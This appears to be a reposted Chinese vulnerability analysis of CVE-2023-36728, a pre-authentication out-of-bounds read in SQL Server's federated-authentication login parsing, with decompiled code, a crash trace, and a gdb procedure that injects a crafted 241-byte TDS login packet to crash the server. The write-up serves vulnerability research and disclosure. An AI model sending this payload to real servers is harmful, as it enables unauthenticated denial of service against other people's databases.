Windows SQL Server 预身份验证溢出读取 (CVE-2023-36728)
2023年10月16日。本文分析 SQL Server 的一个未认证远程 DoS 漏洞。
环境
SQL Server 版本:sql server 2022.160.4035.4
主机系统:windows 1809
漏洞
在 sqllang.dll(版本 2022.160.4035.4)的函数 CFedAuthFeatureExtension::ReadIDCRLToken 中(以下为反编译片段,首尾均有截断):
// Decompiler output (truncated at both ends) of CFedAuthFeatureExtension::ReadIDCRLToken.
// From the usage below: a2 points at a field made of a 4-byte length prefix followed by
// token bytes, a3 points at a "bytes remaining" counter for the feature data, and a4
// receives a status code.  NOTE(review): these roles are inferred from the accesses
// in this fragment, not from symbols — confirm against the full function.
v4 = 0;
// Nothing left in the feature data: report status 9 and return 0.
if ( !*a3 )
{
*(_DWORD *)a4 = 9;
return 0i64;
}
v8 = a2 + 4;                    // token bytes start right after the length prefix
len1 = *(unsigned int *)a2;     // token length as declared by the client in the login message
                                // (this runs under process_login, see the call stack below)
v10 = *a3 - 4;                  // bytes remaining once the length prefix is consumed
if ( *a3 == 4 )
{
*(_DWORD *)a4 = 10;             // length prefix present but no token data: status 10
}
else
{
// The remaining-bytes field is updated before the bound below is evaluated, and the
// bound compares v10 only against (int)len1 + 0x40 — a signed int built from the
// client-declared length.  Nothing in this fragment relates len1, or *a3, to the
// number of bytes actually received; whether the comparison is signed or unsigned
// depends on v10's type, which the decompiler does not show.
*((_DWORD *)this + 28) = v10 - (len1 + 0x40);
if ( v10 >= (int)len1 + 0x40 )
{
_mm_lfence();
// Allocation size rounded up to an even byte count; is_mul_ok guards the multiply and
// on overflow v11 becomes -1 (a size new[] presumably cannot satisfy, hence the NULL
// check on v12 below — confirm).
v11 = 2i64 * (((unsigned int)len1 >> 1) + 1);
if ( !is_mul_ok(((unsigned int)len1 >> 1) + 1, 2ui64) )
v11 = -1i64;
v12 = operator new[](v11, *((struct IMemObj **)this + 2), 1, "sql\ntdbms\tds\src\featureext.cpp", 1585, 3u);
*((_QWORD *)this + 7) = v12;
if ( v12 )
{
_mm_lfence();
// len1 is passed as both the destination size and the byte count, so memcpy_s has
// nothing to check the SOURCE against: it reads len1 bytes starting at v8 however
// many bytes the client actually sent.  The crash below faults inside this call,
// with the count r8 = 0xccffff and the faulting address rdx+r8-0x20 lying beyond the
// readable memory that follows the source buffer.
memcpy_s(*((void *const *)this + 7), len1, v8, len1);
影响
崩溃堆栈跟踪
(168c.27a4): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
sqllang!memcpy+0x180:
00007ffd`78f382fc c4a17e6f6c02e0 vmovdqu ymm5,ymmword ptr [rdx+r8-20h] ds:000001c2`20ff9b3d=??
0:019> k
# Child-SP RetAddr Call Site
00 0000008f`407fe9e8 00007ffd`78f33493 sqllang!memcpy+0x180
01 0000008f`407fe9f0 00007ffd`79a99658 sqllang!memcpy_s+0x5e
02 0000008f`407fea20 00007ffd`79a99525 sqllang!CFedAuthFeatureExtension::ReadIDCRLToken+0xe6
03 0000008f`407fea80 00007ffd`78f955b9 sqllang!CFedAuthFeatureExtension::ParseFeatureData+0x245
04 0000008f`407fead0 00007ffd`78f93f6f sqllang!CPhysicalConnection::FParseFeatureExtension+0x29e
05 0000008f`407fec30 00007ffd`78f93c8e sqllang!CPhysicalConnection::FCreateLoginRec+0x6dd
06 0000008f`407feea0 00007ffd`78f93b0b sqllang!process_login+0x24e
07 0000008f`407fef40 00007ffd`78f46c30 sqllang!process_commands_internal+0x45b
08 0000008f`407ff080 00007ffd`7ef088db sqllang!process_messages+0x1e0
09 0000008f`407ff230 00007ffd`7ef09298 sqldk!SOS_Task::Param::Execute+0x232
0a 0000008f`407ff830 00007ffd`7ef08df4 sqldk!SOS_Scheduler::RunTask+0x182
0b 0000008f`407ff930 00007ffd`7ef28293 sqldk!SOS_Scheduler::ProcessTasks+0x344
0c 0000008f`407ffa80 00007ffd`7ef2833c sqldk!Worker::EntryPoint+0x2f9
0d 0000008f`407ffb60 00007ffd`7ef27f7f sqldk!ThreadScheduler::RunWorker+0xc
0e 0000008f`407ffb90 00007ffd`7ef27c65 sqldk!SystemThreadDispatcher::ProcessWorker+0x589
0f 0000008f`407ffc70 00007ffd`b8447e94 sqldk!SchedulerManager::ThreadEntryPoint+0x3cf
10 0000008f`407ffd80 00007ffd`babf7ad1 KERNEL32!BaseThreadInitThunk+0x14
11 0000008f`407ffdb0 00000000`00000000 ntdll!RtlUserThreadStart+0x21
0:019> r
rax=000001c226000040 rbx=0000000000ccffff rcx=000001c226000040
rdx=000001c220329b5e rsi=000001c220329b5e rdi=0000000000ccffff
rip=00007ffd78f382fc rsp=0000008f407fe9e8 rbp=00000000ffffffff
r8=0000000000ccffff r9=000001c220ff9b5d r10=00007ffd78f30000
r11=0000008f407fe928 r12=0000000000000000 r13=000001c220329b5e
r14=0000000000ccffff r15=0000000000668000
iopl=0 nv up ei pl nz na po nc
cs=0033 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010206
sqllang!memcpy+0x180:
00007ffd`78f382fc c4a17e6f6c02e0 vmovdqu ymm5,ymmword ptr [rdx+r8-20h] ds:000001c2`20ff9b3d=??
sudo rpm -i msodbcsql17-17.2.0.1-1.x86_64.rpm
sudo rpm -i mssql-tools-17.2.0.1-1.x86_64.rpm
gdb --args /opt/mssql-tools/bin/sqlcmd -S 192.168.150.141,50128 -G -C -U "aabb" -P "a"
b main
r
b send
c
Breakpoint 2, 0x00007ffff6b30be0 in send () from /lib64/libpthread.so.0
b SSL_write
disa 1 2
c
Breakpoint 3, 0x00007fffee1f5740 in SSL_write () from /lib64/libssl.so.10
set {char[241]}$rsi="x10x01x00xe5x00x00x00x00xddx00x00x00x04x00x00x74x00x10x00x00x00x00x00x07xbbxaax00x00x00x00x00x00xe0x03x00x10xf0x00x00x00x09x04x00x00x5ex00x0ax00x72x00x00x00x72x00x00x00x72x00x0cx00x8ax00x0fx00xd0x00x04x00x8ex00x0ex00xaax00x00x00xaax00x06x00x00xe0x4cx68x0dx9cxb6x00x00x00xb6x00x00x00xb6x00x00x00x00x00x00x00x54x00x65x00x73x00x74x00x43x00x6cx00x69x00x65x00x6ex00x74x00x50x00x79x00x54x00x65x00x73x00x74x00x43x00x6cx00x69x00x65x00x6ex00x74x00x31x00x39x00x32x00x2ex00x31x00x36x00x38x00x2ex00x31x00x35x00x30x00x2ex00x31x00x34x00x31x00x50x00x79x00x20x00x54x00x44x00x53x00x20x00x6cx00x69x00x62x00x72x00x61x00x72x00x79x00x6dx00x61x00x73x00x74x00x65x00x72x00xd4x00x00x00x02x04x00x00x00x00xffxffxcc"
set $rdx=0xE5
set $r12=0xe5
c
9.在 SQL Server 中,windbg:
原文始发于微信公众号(Ots安全):Windows SQL Server 预身份验证溢出读取 (CVE-2023-36728)